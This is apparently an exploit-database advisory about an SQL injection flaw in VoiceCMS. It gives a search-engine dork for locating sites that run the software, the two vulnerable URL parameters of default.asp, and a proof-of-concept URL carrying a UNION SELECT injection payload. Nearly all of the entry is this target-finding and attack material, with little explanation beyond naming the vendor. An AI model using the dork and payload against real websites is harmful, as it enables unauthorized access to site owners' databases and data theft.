id: 15620
date: 03/17/2011
title: VoiceCMS SQL Injection Vulnerability
author: p0pc0rn
cves: 

Title     : VoiceCMS Vulnerable to SQL Injection
Vendor : http://www.voicecms.ca
Found by : p0pc0rn
Dork    : intext:"Powered by VoiceCMS"

SQL - Jet Engine Database Error
-------------------------------
Parameter
http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]
http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

POC
---
http://site.com/default.asp?com=PhotoGallery&id=1 union select 0 from test.a&m=1



#  0day.today [2023-03-25]  #